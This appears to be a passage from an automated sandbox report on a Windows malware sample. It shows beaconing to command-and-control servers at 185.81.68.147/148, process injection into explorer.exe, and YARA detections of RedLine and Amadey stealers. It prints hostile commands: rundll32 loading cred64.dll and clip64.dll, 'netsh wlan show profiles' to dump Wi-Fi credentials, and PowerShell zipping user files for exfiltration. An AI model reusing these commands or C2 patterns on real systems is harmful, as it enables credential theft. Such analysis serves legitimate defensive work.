Dec 13, 2024 01:39:00.891875982 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:39:02.226257086 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	50065	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:01.625380039 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:39:01.745424032 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:39:03.076997995 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	50071	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:03.312808990 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:39:03.432771921 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:39:04.947021008 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.5	50073	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:04.052398920 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:39:05.381978989 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.5	50072	185.81.68.148	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:04.052465916 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:39:05.381890059 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	50074	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:05.236004114 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:39:05.356888056 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:39:06.733350039 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	50080	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:06.969074965 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:39:07.088928938 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:39:08.433083057 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	50081	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:07.082148075 CET	309	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:39:08.461338043 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.5	50082	185.81.68.148	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:07.082216978 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:39:08.461426020 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	50088	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:39:08.657063007 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:39:08.777204037 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:39:10.276473045 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:39:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessInternalW	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessInternalW	INLINE	0xE9 0x90 0x00 0x07 0x75 0x5F

Target ID:	0
Start time:	19:36:56
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\yINR7uQlPr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\yINR7uQlPr.exe"
Imagebase:	0x7ff79e380000
File size:	307'712 bytes
MD5 hash:	1BBC3BFF13812C25D47CD84BCA3DA2DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:36:56
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\svchost.exe"
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3377839465.0000017002C7D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	19:36:56
Start date:	12/12/2024
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\audiodg.exe"
Imagebase:	0x7ff7a91b0000
File size:	632'808 bytes
MD5 hash:	627DEA21175691FDE4495877C53B4C87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	19:36:56
Start date:	12/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msiexec.exe"
Imagebase:	0x7ff7179d0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	19:36:56
Start date:	12/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	19:37:08
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
Imagebase:	0x7ff6743d0000
File size:	307'712 bytes
MD5 hash:	1BBC3BFF13812C25D47CD84BCA3DA2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:37:08
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\svchost.exe"
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:37:08
Start date:	12/12/2024
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\audiodg.exe"
Imagebase:	0x7ff7a91b0000
File size:	632'808 bytes
MD5 hash:	627DEA21175691FDE4495877C53B4C87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:37:08
Start date:	12/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msiexec.exe"
Imagebase:	0x7ff7179d0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:37:15
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
Imagebase:	0x7ff690010000
File size:	5'915'948 bytes
MD5 hash:	AE2A4249C8389603933DF4F806546C96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	19:37:16
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
Imagebase:	0x7ff6743d0000
File size:	307'712 bytes
MD5 hash:	1BBC3BFF13812C25D47CD84BCA3DA2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	19:37:16
Start date:	12/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\svchost.exe"
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:37:16
Start date:	12/12/2024
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\audiodg.exe"
Imagebase:	0x7ff7a91b0000
File size:	632'808 bytes
MD5 hash:	627DEA21175691FDE4495877C53B4C87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:37:16
Start date:	12/12/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\msiexec.exe"
Imagebase:	0x7ff7179d0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	19:37:17
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
Imagebase:	0x7ff690010000
File size:	5'915'948 bytes
MD5 hash:	AE2A4249C8389603933DF4F806546C96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	19:37:18
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe"
Imagebase:	0x5c0000
File size:	307'712 bytes
MD5 hash:	7B6730CA4DA283A35C41B831B9567F15
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	19:37:23
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe"
Imagebase:	0x690000
File size:	441'344 bytes
MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	19:37:24
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
Imagebase:	0x7a0000
File size:	441'344 bytes
MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	19:37:26
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Imagebase:	0x7a0000
File size:	441'344 bytes
MD5 hash:	4962575A2378D5C72E7A836EA766E2AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	19:37:32
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0xc70000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:37:32
Start date:	12/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0x7ff7bc440000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:37:32
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0xc70000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: rundll32.exePID: 6664, Parent PID: 6020

General

Target ID:	24
Start time:	19:37:32
Start date:	12/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Imagebase:	0x7ff7bc440000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: netsh.exePID: 6256, Parent PID: 2164

General

Target ID:	25
Start time:	19:37:33
Start date:	12/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff734670000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:37:33
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:37:33
Start date:	12/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff734670000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	19:37:33
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:37:36
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Imagebase:	0xc70000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	19:37:36
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Imagebase:	0xc70000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	19:37:37
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	19:37:37
Start date:	12/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	19:37:37
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	19:37:37
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	19:37:47
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\10000820101\update.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
Imagebase:	0x7ff632ac0000
File size:	308'224 bytes
MD5 hash:	DD1E3F38AE7711D270748012AF613950
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
